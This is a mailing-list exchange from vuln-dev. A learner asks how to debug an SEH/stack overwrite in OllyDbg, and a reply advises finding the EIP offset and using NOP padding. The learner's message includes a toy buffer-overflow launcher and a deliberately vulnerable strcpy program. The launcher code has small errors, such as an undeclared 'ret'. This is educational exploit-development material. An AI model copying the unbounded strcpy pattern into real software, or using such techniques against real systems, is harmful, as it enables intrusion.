Re: debugging seh overwrite

["Karma" <karma () frij com au>]

Hey, my english isnt great either...

I am not an Ollydbg user but STEP OVER until your CALL STRCPY is reached, 
then STEP INTO the strcpy function one level. Then you keep STEP OVER until 
you see the RETN call from that function. You should see how your buffer 
overwrite, in this case 41414141h overwrite EIP and possibly ESP too. If you 
want to see the pointer be overwritten actually, you need to step into 
function which possible has a rep mov in strcpy, I dont know where. But you 
can see if you monitor destination of rep mov

Also in your case, I havent tried but you simply set EIP to 41414141h which

a. is not the stack address, likely causes segfault
b. is invalid opcode, no valid slide

Find offset of EIP using the crash, and use 90h as padding to try  :)

Your code - memset(payload, 0x41, 80);  \\  try 0x90
Your code - memcpy(payload+80, &ret, sizeof (int)); \\ yeah you need &ret 
and you need to check offset at eip

Sorry if I misunderstand your question....

Karma




www.designfolks.com.au

----- Original Message ----- 
From: <laphoo () gmail com>
To: <vuln-dev () securityfocus com>
Sent: Monday, March 20, 2006 1:19 PM
Subject: debugging seh overwrite


Hello, I would like to know a way to debugging a vulnerable program, where I 
am overwriting the se handler with my address. I have OllyDbg as just in 
time debugger. If my exploit-buffer reaches the pointer to the next seh 
record, nothing happens. Now I was trying to put breakpoint instructions 
0xcc) as fake pointer but OllyDbg ignored them, or I did something wrong. 
How is it possible to debug my vulnerable program with OllyDbg, to see where 
and with which data I overwrote something?

/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
int main (void)
{
   char *app[3];
   char payload[84];
   unsigned int ptr = 0xcccccccc;
   memset(payload, 0x00, sizeof payload);
   memset(payload, 0x41, 80);
   memcpy(payload+80, &ret, sizeof (int));
   app[0] = "vuln.exe";
   app[1] = payload;
   app[2] = NULL;
   execve(app[0], app, NULL);
   return 0;
}


/*vuln.c /
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
   char string[32];
   if (argc > 2)
   {
       printf("Usage: %s <string>\n", argv[0]);
       return 0;
   }
   strcpy(string, argv[1]);
   printf("%s", string);
   return 0;
}

Environment is Windows.XP.SP.2

I am sorry for my bad english.

Regards,
-- Laphoo